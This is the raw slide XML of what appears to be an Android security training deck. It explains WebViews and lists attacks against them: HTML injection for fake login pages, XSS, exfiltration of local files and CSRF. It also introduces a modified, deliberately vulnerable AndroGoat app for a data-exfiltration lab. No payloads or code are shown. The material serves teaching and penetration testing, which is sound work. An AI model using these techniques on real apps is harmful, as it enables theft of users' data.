              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>acts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> like a miniature web browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>which</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>load</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> web content like HTML and JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>within</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> of an Android </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>activit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>WebViews</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>useful</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>when</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>need</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> to have extensive control over the web content </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>being</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>loaded</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Interesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>WebView</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Properties</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>WebViews</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> can have as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>many</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> permissions as the app </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>includes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>it</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>They</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>explicitly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>enabled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>execute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>The can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>load</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> local as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>well</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>remote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> web content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>Native Android </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>functions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>sometimes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>accessed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>WebViews</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the help or JavaScript, via Javascript Interfaces</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030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nSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>In the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>earlier</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> section. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>We</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>understood</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>WebViews</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> are miniature web browsers. This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Means</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>they</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>susceptible to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> issues </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> affect normal browsers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Some</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> or the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>common</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>HTML Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>could</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>useful</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> for pushing: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>take</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> login page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>: change the page, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>invoke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>functionality</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>JavaScriot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>. Etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>extiltration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>or local files (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>depending</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>webview</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> settings)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Possibly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>User </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Impersonation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> CSRF via XSS (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>depending</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> on the application)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pP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618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Introduction to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>AndroGoat</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>AndroGoat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> Android application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>written</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Kotin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>many</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>relating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Various</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> Android components like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>WebViews</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>storage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> Issues, etc. It </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> an open source </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>project</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Official Project URL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/satishpatnayak/AndroGoat</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>lab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> use a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>modified</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> version </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>illustrate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>interesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>data exfiltration </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>techniques </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>real </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>penetration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> tests </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" i="1" u="sng" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/TmmmmmR/mobile-training/raw/master/android/AndroGoat_Improved.apk</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" i="1" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Preliminaries</a:t>
            </a:r>
            <a:r>
